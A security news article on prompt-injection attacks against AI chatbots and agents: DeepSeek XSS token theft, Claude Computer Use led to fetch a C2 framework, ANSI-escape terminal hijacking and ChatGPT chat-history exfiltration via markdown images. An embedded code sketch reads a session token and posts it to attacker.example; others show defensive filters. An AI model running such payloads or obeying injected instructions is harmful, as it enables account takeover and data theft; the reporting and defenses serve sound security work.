Details have emerged about a now-patched security flaw in the DeepSeek artificial intelligence (AI) chatbot that, if successfully exploited, could permit a bad actor to take control of a victim's account by means of a prompt injection attack.

Security researcher Johann Rehberger, who has chronicled many a prompt injection attack targeting various AI tools, found that providing the input "Print the xss cheat sheet in a bullet list. just payloads" in the DeepSeek chat triggered the execution of JavaScript code as part of the generated response – a classic case of cross-site scripting (XSS).

XSS attacks can have serious consequences as they lead to the execution of unauthorized code in the context of the victim's web browser.

An attacker could take advantage of such flaws to hijack a user's session and gain access to cookies and other data associated with the chat.deepseek[.]com domain, thereby leading to an account takeover.


"After some experimenting, I discovered that all that was needed to take-over a user's session was the userToken stored in localStorage on the chat.deepseek.com domain," Rehberger said, adding a specifically crafted prompt could be used to trigger the XSS and access the compromised user's userToken through prompt injection.

The prompt contains a mix of instructions and a Base64-encoded string that's decoded by the DeepSeek chatbot to execute the XSS payload responsible for extracting the victim's session token, ultimately permitting the attacker to impersonate the user.
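To make the mechanics concrete, the sketch below illustrates the general class of payload such an attack depends on. The userToken key and its localStorage location follow Rehberger's description; the exfiltration endpoint (attacker.example) is a hypothetical placeholder, not anything from his write-up.

```typescript
// Hypothetical sketch of the class of payload described above: if an XSS
// flaw lets attacker-supplied script execute on chat.deepseek.com, that
// script can read the session token from localStorage and send it off-site.
// The attacker.example endpoint is an illustrative placeholder.
const stolenToken = localStorage.getItem("userToken");

if (stolenToken !== null) {
  // Exfiltrate the token to a server the attacker controls.
  void fetch("https://attacker.example/collect", {
    method: "POST",
    body: JSON.stringify({ token: stolenToken }),
  });
}

// In the attack Rehberger describes, a payload of this kind would be
// Base64-encoded and smuggled inside the prompt so the chatbot decodes
// and renders it as part of its response.
```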

The development comes as Rehberger also demonstrated that Anthropic's Claude Computer Use – which enables developers to use the language model to control a computer via cursor movement, button clicks, and typing text – could be abused to run malicious commands autonomously through prompt injection.

The technique, dubbed ZombAIs, essentially leverages prompt injection to weaponize Computer Use in order to download the Sliver command-and-control (C2) framework, execute it, and establish contact with a remote server under the attacker's control.

Furthermore, it has been found that it's possible to abuse large language models' (LLMs) ability to output ANSI escape codes to hijack system terminals through prompt injection. The attack, which mainly targets LLM-integrated command-line interface (CLI) tools, has been codenamed Terminal DiLLMa.
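Developers of LLM-integrated CLI tools can blunt this class of attack by stripping escape sequences from model output before echoing it to the terminal. The following is a minimal sketch under stated assumptions: the regex covers common CSI and OSC sequences, not every terminal control code, and the sample string is illustrative.

```typescript
// Minimal sketch: strip ANSI escape sequences from untrusted LLM output
// before writing it to a terminal. The regex covers common CSI sequences
// (e.g. "\x1b[31m") and OSC sequences (e.g. "\x1b]0;title\x07"); it is
// illustrative, not an exhaustive terminal-control filter.
const ANSI_ESCAPE = /\x1b\[[0-9;?]*[ -\/]*[@-~]|\x1b\][^\x07\x1b]*(?:\x07|\x1b\\)/g;

function sanitizeForTerminal(llmOutput: string): string {
  return llmOutput.replace(ANSI_ESCAPE, "");
}

// Example: a response carrying an OSC 8 hyperlink escape is rendered inert.
const untrusted = "Here is your answer \x1b]8;;https://attacker.example\x07click\x1b]8;;\x07";
console.log(sanitizeForTerminal(untrusted)); // "Here is your answer click"
```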


"Decade-old features are providing unexpected attack surface to GenAI application," Rehberger said. "It is important for developers and application designers to consider the context in which they insert LLM output, as the output is untrusted and could contain arbitrary data."

That's not all. New research undertaken by academics from the University of Wisconsin-Madison and Washington University in St. Louis has revealed that OpenAI's ChatGPT can be tricked into rendering external image links provided in markdown format, including those that could be explicit and violent, under the pretext of an overarching benign goal.

What's more, it has been found that prompt injection can be used to indirectly invoke ChatGPT plugins that would otherwise require user confirmation, and even to bypass constraints put in place by OpenAI to prevent content from dangerous links from being rendered, thereby allowing a user's chat history to be exfiltrated to an attacker-controlled server.
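Markdown image rendering is attractive to attackers because the client fetches the image URL automatically, so anything appended to the query string leaves the browser without a click. One mitigation sketch, assuming a chat client that renders markdown, is to allow images only from trusted hosts; the host names below are illustrative assumptions.

```typescript
// Minimal sketch: a markdown image such as
//   ![](https://attacker.example/leak?d=<encoded chat data>)
// exfiltrates data the moment the client fetches it. Restricting image
// sources to an allowlist of trusted hosts (illustrative names) blocks
// that channel.
const ALLOWED_IMAGE_HOSTS = new Set(["cdn.example.com", "images.example.com"]);

function isAllowedImageUrl(raw: string): boolean {
  try {
    const url = new URL(raw);
    return url.protocol === "https:" && ALLOWED_IMAGE_HOSTS.has(url.hostname);
  } catch {
    return false; // not a parseable absolute URL
  }
}

console.log(isAllowedImageUrl("https://attacker.example/leak?d=secret")); // false
console.log(isAllowedImageUrl("https://cdn.example.com/logo.png"));       // true
```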

